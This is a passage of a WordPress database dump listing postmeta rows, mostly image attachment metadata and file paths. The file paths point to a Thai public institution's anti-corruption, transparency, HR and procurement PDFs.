(2724,997,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214246_0-1.jpg\";s:8:\"filesize\";i:339739;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214246_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13512;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214246_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96975;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214246_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7497;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214246_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60965;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214246_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180892;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214246_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16637;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2725,998,'_wp_attached_file','2024/08/S__69214249_0-1.jpg'),
(2726,998,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214249_0-1.jpg\";s:8:\"filesize\";i:339093;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214249_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13155;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214249_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94838;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214249_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7526;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214249_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59512;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214249_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:179287;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214249_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16576;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2727,999,'_wp_attached_file','2024/08/S__69214251_0-1.jpg'),
(2728,999,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:27:\"2024/08/S__69214251_0-1.jpg\";s:8:\"filesize\";i:672184;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214251_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16785;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214251_0-1-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167080;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214251_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7700;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214251_0-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98175;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214251_0-1-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:335651;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214251_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21672;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2730,905,'_edit_last','1'),
(2732,905,'title_style','default'),
(2733,905,'_title_style','field_5d1a0217cf408'),
(2734,1000,'title_style','default'),
(2735,1000,'_title_style','field_5d1a0217cf408'),
(2736,905,'_thumbnail_id','993'),
(2738,905,'related',''),
(2739,905,'_related','field_603b51c3e183e'),
(2740,1000,'related',''),
(2741,1000,'_related','field_603b51c3e183e'),
(2742,1001,'title_style','default'),
(2743,1001,'_title_style','field_5d1a0217cf408'),
(2744,1002,'title_style','default'),
(2745,1002,'_title_style','field_5d1a0217cf408'),
(2746,1003,'_edit_lock','1725250709:1'),
(2747,1004,'_wp_attached_file','2024/08/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี.pdf'),
(2748,1004,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1263399;}'),
(2749,1003,'_edit_last','1'),
(2750,1003,'title_style','default'),
(2751,1003,'_title_style','field_5d1a0217cf408'),
(2752,1005,'title_style','default'),
(2753,1005,'_title_style','field_5d1a0217cf408'),
(2754,1006,'title_style','default'),
(2755,1006,'_title_style','field_5d1a0217cf408'),
(2756,1007,'title_style','default'),
(2757,1007,'_title_style','field_5d1a0217cf408'),
(2759,1009,'title_style','default'),
(2760,1009,'_title_style','field_5d1a0217cf408'),
(2761,1010,'_edit_lock','1724159205:1'),
(2762,1011,'_wp_attached_file','2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf'),
(2763,1011,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:694580;}'),
(2764,1010,'_edit_last','1'),
(2765,1010,'title_style','default'),
(2766,1010,'_title_style','field_5d1a0217cf408'),
(2767,1012,'title_style','default'),
(2768,1012,'_title_style','field_5d1a0217cf408'),
(2769,1013,'title_style','default'),
(2770,1013,'_title_style','field_5d1a0217cf408'),
(2772,1015,'title_style','default'),
(2773,1015,'_title_style','field_5d1a0217cf408'),
(2774,1016,'_edit_lock','1724207418:1'),
(2775,1017,'_wp_attached_file','2024/08/รายงานการดำเนินการป้องกันการทุจริตประจำปี.pdf'),
(2776,1017,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:109433;}'),
(2777,1016,'_edit_last','1'),
(2778,1016,'title_style','default'),
(2779,1016,'_title_style','field_5d1a0217cf408'),
(2780,1018,'title_style','default'),
(2781,1018,'_title_style','field_5d1a0217cf408'),
(2782,1019,'title_style','default'),
(2783,1019,'_title_style','field_5d1a0217cf408'),
(2784,1020,'_edit_lock','1724208353:1'),
(2785,1021,'_wp_attached_file','2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf'),
(2786,1021,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:572708;}'),
(2787,1022,'_wp_attached_file','2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี.pdf'),
(2788,1022,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:572708;}'),
(2789,1020,'_edit_last','1'),
(2790,1020,'title_style','default'),
(2791,1020,'_title_style','field_5d1a0217cf408'),
(2792,1023,'title_style','default'),
(2793,1023,'_title_style','field_5d1a0217cf408'),
(2794,1024,'title_style','default'),
(2795,1024,'_title_style','field_5d1a0217cf408'),
(2796,1025,'_wp_attached_file','2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf'),
(2797,1025,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:737730;}'),
(2798,1026,'title_style','default'),
(2799,1026,'_title_style','field_5d1a0217cf408'),
(2800,1027,'title_style','default'),
(2801,1027,'_title_style','field_5d1a0217cf408'),
(2802,1029,'_edit_lock','1724209026:1'),
(2803,1030,'_wp_attached_file','2024/08/30-2567.png'),
(2804,1030,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/08/30-2567.png\";s:8:\"filesize\";i:2920948;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"30-2567-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105422;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"30-2567-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:875365;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"30-2567-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45209;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"30-2567-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:978708;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"30-2567-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1850339;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"30-2567-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:106103;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2806,1029,'_thumbnail_id','1030'),
(2807,1029,'_edit_last','1'),
(2808,1029,'title_style','default'),
(2809,1029,'_title_style','field_5d1a0217cf408'),
(2810,1029,'related',''),
(2811,1029,'_related','field_603b51c3e183e'),
(2812,1031,'title_style','default'),
(2813,1031,'_title_style','field_5d1a0217cf408'),
(2814,1031,'related',''),
(2815,1031,'_related','field_603b51c3e183e'),
(2816,1032,'_edit_lock','1751336764:1'),
(2817,1033,'_wp_attached_file','2024/08/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf'),
(2818,1033,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:4576261;}'),
(2819,1032,'_edit_last','1'),
(2820,1032,'title_style','default'),
(2821,1032,'_title_style','field_5d1a0217cf408'),
(2822,1034,'title_style','default'),
(2823,1034,'_title_style','field_5d1a0217cf408'),
(2824,1035,'title_style','default'),
(2825,1035,'_title_style','field_5d1a0217cf408'),
(2826,1036,'_edit_lock','1747383234:1'),
(2827,1037,'_wp_attached_file','2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf'),
(2828,1037,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:695020;}'),
(2829,1036,'_edit_last','1'),
(2830,1036,'title_style','default'),
(2831,1036,'_title_style','field_5d1a0217cf408'),
(2832,1038,'title_style','default'),
(2833,1038,'_title_style','field_5d1a0217cf408'),
(2834,1039,'title_style','default'),
(2835,1039,'_title_style','field_5d1a0217cf408'),
(2836,1040,'title_style','default'),
(2837,1040,'_title_style','field_5d1a0217cf408'),
(2839,1042,'title_style','hidden'),
(2840,1042,'_title_style','field_5d1a0217cf408'),
(2841,1043,'title_style','default'),
(2842,1043,'_title_style','field_5d1a0217cf408'),
(2844,1046,'title_style','default'),
(2845,1046,'_title_style','field_5d1a0217cf408'),
(2846,1047,'_wp_attached_file','2024/08/Is-It-a-Gift-Instagram-Post-1-1.png'),
(2847,1047,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:43:\"2024/08/Is-It-a-Gift-Instagram-Post-1-1.png\";s:8:\"filesize\";i:73099;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"Is-It-a-Gift-Instagram-Post-1-1-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11553;}s:5:\"large\";a:5:{s:4:\"file\";s:44:\"Is-It-a-Gift-Instagram-Post-1-1-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95600;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"Is-It-a-Gift-Instagram-Post-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10403;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"Is-It-a-Gift-Instagram-Post-1-1-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58757;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:43:\"Is-It-a-Gift-Instagram-Post-1-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27826;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2849,355,'_generateblocks_dynamic_css_version','1.9.1'),
(2850,355,'_thumbnail_id','1047'),
(2851,1049,'title_style','hidden'),
(2852,1049,'_title_style','field_5d1a0217cf408'),
(2853,1051,'title_style','hidden'),
(2854,1051,'_title_style','field_5d1a0217cf408'),
(2855,1052,'_edit_lock','1724380160:1'),
(2856,1053,'_wp_attached_file','2024/08/รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf'),
(2857,1053,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:757082;}'),
(2859,1052,'_edit_last','1'),
(2860,1052,'title_style','default'),
(2861,1052,'_title_style','field_5d1a0217cf408'),
(2862,1055,'title_style','default'),
(2863,1055,'_title_style','field_5d1a0217cf408'),
(2864,1056,'title_style','default'),
(2865,1056,'_title_style','field_5d1a0217cf408'),
(2867,1058,'title_style','default'),
(2868,1058,'_title_style','field_5d1a0217cf408'),
(2869,1059,'_edit_lock','1724398751:1'),
(2870,1060,'_wp_attached_file','2024/08/ประกาศประกาศผู้ชนะการเสนอราคา-ซื้ออุปกรณ์พัฒนาระบบรักษาความปลอดภัยในสถานศึกษา.pdf'),
(2871,1060,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:189566;}'),
(2872,1061,'_wp_attached_file','2024/08/ประกาศผู้ชนะการเสนอราคา-ซื้อหนังสือเรียนฟรี-โดยวิธีเฉพาะเจาะจง.pdf'),
(2873,1061,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:170253;}'),
(2874,1062,'_wp_attached_file','2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf'),
(2875,1062,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:174208;}'),
(2876,1059,'_edit_last','1'),
(2877,1059,'title_style','default'),
(2878,1059,'_title_style','field_5d1a0217cf408'),
(2879,1063,'title_style','default'),
(2880,1063,'_title_style','field_5d1a0217cf408'),
(2881,1064,'title_style','default'),
(2882,1064,'_title_style','field_5d1a0217cf408'),
(2883,1065,'title_style','hidden'),
(2884,1065,'_title_style','field_5d1a0217cf408'),
(2885,1066,'title_style','hidden'),
(2886,1066,'_title_style','field_5d1a0217cf408'),
(2888,1068,'title_style','default'),
(2889,1068,'_title_style','field_5d1a0217cf408'),
(2890,1070,'title_style','hidden'),
(2891,1070,'_title_style','field_5d1a0217cf408'),
(2892,1072,'title_style','default'),
(2893,1072,'_title_style','field_5d1a0217cf408'),
(2894,1073,'_wp_attached_file','2024/08/คู่มือสำหรับประชาชน.pdf'),
(2895,1073,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:73877;}'),
(2896,1074,'title_style','default'),
(2897,1074,'_title_style','field_5d1a0217cf408'),
(2898,1075,'_wp_attached_file','2024/08/คู่มือสำหรับประชาชน-1.pdf'),
(2899,1075,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:75239;}'),
(2900,1076,'title_style','default'),
(2901,1076,'_title_style','field_5d1a0217cf408'),
(2902,1077,'title_style','default'),
(2903,1077,'_title_style','field_5d1a0217cf408'),
(2905,1079,'title_style','hidden'),
(2906,1079,'_title_style','field_5d1a0217cf408'),
(2916,1084,'title_style','hidden'),
(2917,1084,'_title_style','field_5d1a0217cf408'),
(2918,1085,'_wp_attached_file','2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf'),
(2919,1085,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:9127361;}'),
(2921,1087,'title_style','default'),
(2922,1087,'_title_style','field_5d1a0217cf408'),
(2923,1088,'_wp_attached_file','2024/09/รายงานผลการบริหารและพัฒนาทรัพยากรบุคคล.pdf'),
(2924,1088,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:2590134;}'),
(2925,1089,'title_style','default'),
(2926,1089,'_title_style','field_5d1a0217cf408'),
(2927,1090,'_edit_lock','1725250507:1'),
(2928,1091,'_wp_attached_file','2024/09/S__69550086_0.jpg'),
(2929,1091,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2024/09/S__69550086_0.jpg\";s:8:\"filesize\";i:138585;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69550086_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21450;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69550086_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8952;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69550086_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97880;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69550086_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21126;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2930,1092,'_wp_attached_file','2024/09/5BB0E853-00AB-45DF-8A20-DA4D3A06A120-scaled.jpg'),
(2931,1093,'_wp_attached_file','2024/09/92409712-D1C5-441A-B3CF-46BBEB11306B-scaled.jpg'),
(2932,1094,'_wp_attached_file','2024/09/3D568C24-BF80-4BF6-952F-A61B9BB91A08-scaled.jpg'),
(2933,1095,'_wp_attached_file','2024/09/5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-scaled.jpg'),
(2934,1096,'_wp_attached_file','2024/09/89E33FD3-BD14-4973-B501-053D0C4343C4-scaled.jpg'),
(2935,1097,'_wp_attached_file','2024/09/471BF694-20D7-486D-A69A-0329EB0C5B7E-scaled.jpg'),
(2936,1093,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:55:\"2024/09/92409712-D1C5-441A-B3CF-46BBEB11306B-scaled.jpg\";s:8:\"filesize\";i:496670;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"92409712-D1C5-441A-B3CF-46BBEB11306B-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14520;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"92409712-D1C5-441A-B3CF-46BBEB11306B-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110062;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"92409712-D1C5-441A-B3CF-46BBEB11306B-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8090;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"92409712-D1C5-441A-B3CF-46BBEB11306B-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68473;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"92409712-D1C5-441A-B3CF-46BBEB11306B-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:213624;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"92409712-D1C5-441A-B3CF-46BBEB11306B-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:342352;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:48:\"92409712-D1C5-441A-B3CF-46BBEB11306B-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18298;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"92409712-D1C5-441A-B3CF-46BBEB11306B.jpg\";}'),
(2937,1092,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:55:\"2024/09/5BB0E853-00AB-45DF-8A20-DA4D3A06A120-scaled.jpg\";s:8:\"filesize\";i:512249;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14282;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111839;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8022;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68722;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218118;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:353263;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:48:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18289;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"5BB0E853-00AB-45DF-8A20-DA4D3A06A120.jpg\";}'),
(2938,1094,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:55:\"2024/09/3D568C24-BF80-4BF6-952F-A61B9BB91A08-scaled.jpg\";s:8:\"filesize\";i:502516;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14755;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111490;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8205;}s:12:\"medium_l